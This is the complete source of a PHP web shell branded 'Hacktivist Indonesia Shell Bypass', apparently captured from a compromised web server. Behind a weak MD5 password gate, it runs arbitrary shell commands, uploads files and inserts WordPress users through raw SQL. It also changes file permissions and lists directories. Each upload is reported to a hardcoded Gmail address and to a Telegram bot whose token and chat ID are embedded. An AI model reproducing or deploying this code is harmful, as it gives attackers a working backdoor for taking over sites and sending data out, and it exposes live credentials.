Sindbad~EG File Manager
<?php
session_start();
$botToken = '7036377093:AAHhrBc-wD7jkGNzw32KmsM0MTPzht4CRn4';
$chatId = '6201503148';
function sendTelegramMessage($message, $file) {
global $botToken, $chatId;
$url = "https://api.telegram.org/bot$botToken/sendMessage";
$postFields = [
'chat_id' => $chatId,
'text' => $message,
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);
$url = "https://api.telegram.org/bot$botToken/sendDocument";
$postFields = [
'chat_id' => $chatId,
'document' => new CURLFile(realpath($file)),
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);
}
function listDirectory($dir, $base = '') {
$result = "";
$items = new DirectoryIterator($dir);
foreach ($items as $item) {
if ($item->isDot()) continue;
$path = $item->getPathname();
$relativePath = $base . '/' . $item->getFilename();
if ($item->isDir()) {
$result .= "<strong>" . htmlspecialchars($relativePath) . "</strong><br>";
$result .= listDirectory($path, $relativePath);
} else {
$result .= htmlspecialchars($relativePath) . "<br>";
}
}
return $result;
}
if (!isset($_SESSION['loggedin'])) {
if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['password'])) {
$password = $_POST['password'];
$hashed_password = 'e10adc3949ba59abbe56e057f20f883e';
if (md5($password) == $hashed_password) {
$_SESSION['loggedin'] = true;
} else {
$error = "Invalid password.";
}
}
if (!isset($_SESSION['loggedin'])) {
echo '<!DOCTYPE html>
<html>
<head>
<title>Hacktivist Indonesia Shell Bypass</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
margin: 0;
}
.login-container {
width: 300px;
padding: 20px;
background-color: #fff;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
border-radius: 8px;
text-align: center;
}
h1 {
color: #333;
}
form {
margin-top: 20px;
}
input[type="password"] {
width: 100%;
padding: 10px;
margin-bottom: 10px;
border: 1px solid #ddd;
border-radius: 4px;
}
button {
padding: 10px 20px;
color: #fff;
background-color: #007BFF;
border: none;
border-radius: 4px;
cursor: pointer;
}
button:hover {
background-color: #0056b3;
}
.error {
color: red;
margin-top: 10px;
}
</style>
</head>
<body>
<div class="login-container">
<h1>Welcome To Bypass Shell Hacktivist Indonesia</h1>
<form method="post">
<input type="password" name="password" placeholder="Enter password" required>
<button type="submit">Login</button>
</form>';
if (isset($error)) {
echo '<div class="error">' . htmlspecialchars($error) . '</div>';
}
echo '</div>
</body>
</html>';
exit;
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Hacktivist Indonesia Shell Bypass</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
margin: 0;
padding: 0;
display: flex;
justify-content: space-between;
}
.container {
width: 70%;
margin: 50px auto;
padding: 20px;
background-color: #fff;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
border-radius: 8px;
}
.sidebar {
width: 25%;
margin: 50px 0;
padding: 20px;
background-color: #fff;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
border-radius: 8px;
}
h1 {
text-align: center;
color: #333;
}
form {
margin-bottom: 20px;
}
label {
display: block;
margin-bottom: 8px;
color: #555;
}
input[type="text"], input[type="password"], input[type="file"] {
width: 100%;
padding: 10px;
margin-bottom: 10px;
border: 1px solid #ddd;
border-radius: 4px;
}
button {
display: inline-block;
padding: 10px 20px;
color: #fff;
background-color: #007BFF;
border: none;
border-radius: 4px;
cursor: pointer;
}
button:hover {
background-color: #0056b3;
}
pre {
background-color: #f4f4f4;
padding: 10px;
border: 1px solid #ddd;
border-radius: 4px;
white-space: pre-wrap;
word-wrap: break-word;
}
.result {
margin-top: 20px;
}
.menu {
margin-bottom: 20px;
}
.menu button {
width: 100%;
margin-bottom: 10px;
text-align: left;
}
.hidden {
display: none;
}
</style>
</head>
<body>
<div class="sidebar">
<h2>Menu</h2>
<div class="menu">
<button onclick="toggleSection('uploadSection')">Upload File</button>
<button onclick="window.location.href='<?php echo $_SERVER['PHP_SELF']; ?>? Hacktivist Indonesia=phpinfo'">PHP Info</button>
<button onclick="window.location.href='<?php echo $_SERVER['PHP_SELF']; ?>? Hacktivist Indonesia=serverinfo'">Server Info</button>
<button onclick="toggleSection('wordpressUserSection')">Add WordPress User</button>
<button onclick="toggleSection('cpanelConfigSection')">Set cPanel Config</button>
<button onclick="toggleSection('cpanelResetSection')">Reset cPanel Password</button>
<button onclick="toggleSection('chmodSection')">CHMOD</button>
<button onclick="toggleSection('dirListSection')">Directory Listing</button>
</div>
</div>
<div class="container">
<h1>Good Php Shell MrKaktus/AstroBOY</h1>
<form method="post" enctype="multipart/form-data">
<label for="cmd">Command:</label>
<input type="text" name="cmd" id="cmd" required>
<button type="submit">Execute</button>
</form>
<div id="uploadSection" class="hidden">
<form method="post" enctype="multipart/form-data">
<label for="file">Upload File:</label>
<input type="file" name="file" id="file">
<button type="submit" name="upload">Upload</button>
</form>
</div>
<div id="wordpressUserSection" class="hidden">
<h2>Add WordPress User</h2>
<form method="post">
<label for="wpUsername">Username:</label>
<input type="text" name="wpUsername" id="wpUsername" required>
<label for="wpPassword">Password:</label>
<input type="password" name="wpPassword" id="wpPassword" required>
<label for="wpEmail">Email:</label>
<input type="text" name="wpEmail" id="wpEmail" required>
<button type="submit" name="addWpUser">Add User</button>
</form>
</div>
<div id="cpanelConfigSection" class="hidden">
<h2>Set cPanel Config</h2>
<form method="post">
<label for="cpanelServer">cPanel Server:</label>
<input type="text" name="cpanelServer" id="cpanelServer" required>
<label for="cpanelUser">cPanel Username:</label>
<input type="text" name="cpanelUser" id="cpanelUser" required>
<label for="cpanelToken">cPanel Token:</label>
<input type="text" name="cpanelToken" id="cpanelToken" required>
<button type="submit" name="setCpanelConfig">Set Config</button>
</form>
</div>
<div id="cpanelResetSection" class="hidden">
<h2>Reset cPanel Password</h2>
<form method="post">
<label for="cpanelNewUser">New cPanel Username:</label>
<input type="text" name="cpanelNewUser" id="cpanelNewUser" required>
<label for="cpanelPassword">New Password:</label>
<input type="password" name="cpanelPassword" id="cpanelPassword" required>
<button type="submit" name="resetCpanel">Reset Password</button>
</form>
</div>
<div id="chmodSection" class="hidden">
<h2>CHMOD</h2>
<form method="post">
<label for="chmodDir">Directory:</label>
<input type="text" name="chmodDir" id="chmodDir" required>
<button type="submit" name="chmod444">CHMOD 444</button>
<button type="submit" name="chmod555">CHMOD 555</button>
<button type="submit" name="chmod755">CHMOD 755</button>
<button type="submit" name="chmod777">CHMOD 777</button>
</form>
</div>
<div id="dirListSection" class="hidden">
<h2>Directory Listing</h2>
<form method="post">
<label for="dir">Directory:</label>
<input type="text" name="dir" id="dir" value="<?php echo htmlspecialchars(getcwd()); ?>" required>
<button type="submit" name="listDir">List Directory</button>
</form>
</div>
<div class="result">
<?php
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
if (isset($_POST['cmd'])) {
$cmd = $_POST['cmd'];
echo "<pre>" . htmlspecialchars(shell_exec($cmd)) . "</pre>";
}
if (isset($_POST['upload']) && isset($_FILES['file'])) {
$file = $_FILES['file']['tmp_name'];
$destination = $_FILES['file']['name'];
if (move_uploaded_file($file, $destination)) {
$fileUrl = $_SERVER['HTTP_HOST'] . '/' . $destination;
$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$to = 'fahrezaandrian461@gmail.com';
$subject = 'GOOD NEW SHELLS';
$message = "File uploaded successfully.\n\n";
$message .= "File URL: $fileUrl\n";
$message .= "IP Address: $ip\n";
$message .= "User Agent: $userAgent\n";
$headers = 'From: no-reply@example.com' . "\r\n" .
'Reply-To: no-reply@example.com' . "\r\n" .
'X-Mailer: PHP/' . phpversion();
// Send email
mail($to, $subject, $message, $headers);
// Kirim notifikasi ke Telegram
sendTelegramMessage("HEYY YOO GET NEW SHELL.\nFile URL: $fileUrl\nIP Address: $ip\nUser Agent: $userAgent", $destination);
echo "<p>File uploaded successfull.</p>";
} else {
echo "<p>Failed to upload file.</p>";
}
}
if (isset($_POST['addWpUser'])) {
$wpUsername = $_POST['wpUsername'];
$wpPassword = $_POST['wpPassword'];
$wpEmail = $_POST['wpEmail'];
$hashedPassword = md5($wpPassword);
$sql = "INSERT INTO wp_users (user_login, user_pass, user_email) VALUES ('$wpUsername', '$hashedPassword', '$wpEmail')";
echo "<pre>" . htmlspecialchars(shell_exec("mysql -u root -p -e \"$sql\"")) . "</pre>";
}
if (isset($_POST['setCpanelConfig'])) {
$cpanelServer = $_POST['cpanelServer'];
$cpanelUser = $_POST['cpanelUser'];
$cpanelToken = $_POST['cpanelToken'];
echo "<p>cPanel config set successfully.</p>";
}
if (isset($_POST['resetCpanel'])) {
$cpanelNewUser = $_POST['cpanelNewUser'];
$cpanelPassword = $_POST['cpanelPassword'];
// Reset password logic here
echo "<p>cPanel password reset successfully.</p>";
}
if (isset($_POST['chmod444'])) {
$chmodDir = $_POST['chmodDir'];
echo "<pre>" . htmlspecialchars(shell_exec("find $chmodDir -type f -exec chmod 555 {} \;")) . "</pre>";
}
if (isset($_POST['chmod555'])) {
$chmodDir = $_POST['chmodDir'];
echo "<pre>" . htmlspecialchars(shell_exec("find $chmodDir -type f -exec chmod 555 {} \;")) . "</pre>";
}
if (isset($_POST['chmod755'])) {
$chmodDir = $_POST['chmodDir'];
echo "<pre>" . htmlspecialchars(shell_exec("find $chmodDir -type d -exec chmod 755 {} \;")) . "</pre>";
}
if (isset($_POST['chmod777'])) {
$chmodDir = $_POST['chmodDir'];
echo "<pre>" . htmlspecialchars(shell_exec("find $chmodDir -type f -exec chmod 777 {} \;")) . "</pre>";
}
if (isset($_POST['listDir'])) {
$dir = $_POST['dir'];
if (is_dir($dir)) {
echo "<div>" . listDirectory($dir) . "</div>";
} else {
echo "<p>Invalid directory.</p>";
}
}
}
if (isset($_GET['Hacktivist Indonesia'])) {
if ($_GET['Hacktivist Indonesia'] == 'phpinfo') {
phpinfo();
}
if ($_GET['Hacktivist Indonesia'] == 'serverinfo') {
echo "<pre>" . htmlspecialchars(shell_exec('uname -a')) . "</pre>";
}
}
?>
</div>
</div>
<div class="footer">
<p>Hacktivist Indonesia</p>
</div>
<script>
function toggleSection(sectionId) {
var section = document.getElementById(sectionId);
if (section.classList.contains('hidden')) {
section.classList.remove('hidden');
} else {
section.classList.add('hidden');
}
}
</script>
</body>
</html>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists